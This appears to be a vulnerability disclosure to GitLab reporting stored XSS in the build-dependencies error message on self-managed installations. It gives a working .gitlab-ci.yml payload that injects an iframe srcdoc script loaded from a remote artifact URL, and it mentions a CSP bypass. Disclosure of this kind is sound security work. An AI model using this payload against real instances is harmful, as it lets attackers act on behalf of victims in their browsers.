Hi,
A stored-XSS is existing in error message of build-dependencies. Fortunately it currently does not exist in gitlab.com. It seems that gitlab.com disables the dependencies validation. However this feature is enable by default in self-managed installation.
The following steps should to be reproduced in a self-managed installation of gitlab
.gitlab-ci.yml
for this project using the following content:test<iframe srcdoc='<script src=https://gitlab.com/yvvdwf/data/-/jobs/552156057/artifacts/raw/alert.js></script>'></iframe>:
stage: build
script:
- date > index.html
artifacts:
paths:
- index.html
expire_in: 1 second
job-test:
stage: test
script: echo "hi"
dependencies: ["test<iframe srcdoc='<script src=https://gitlab.com/yvvdwf/data/-/jobs/552156057/artifacts/raw/alert.js></script>'></iframe>"]
job-test
Stored-XSS allow attackers to perform arbitrary actions on behalf of victims at client side.
Furthermore, by using <iframe>
(detailed in #831962), the Stored-XSS can be fired in gitlab.com despite its CSP.
The failure_message
has been considered as safe
The failure_message
should be sanitized.
Please see a screenshot in attached file
(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:env:info
)
System information
System: Ubuntu 18.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.6.6p146
Gem Version: 2.7.10
Bundler Version:1.17.3
Rake Version: 12.3.3
Redis Version: 5.0.9
Git Version: 2.27.0
Sidekiq Version:5.2.9
Go Version: unknown
GitLab information
Version: 13.2.2-ee
Revision: 618883a1f9d
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 11.7
URL: http://gl.local
HTTP Clone URL: http://gl.local/some-group/some-project.git
SSH Clone URL: [email protected]:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 13.3.0
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Stored-XSS allow attackers to perform arbitrary actions on behalf of victims at client side.
Furthermore, by using <iframe>
(detailed in #831962), the Stored-XSS can be fired in gitlab.com despite its CSP.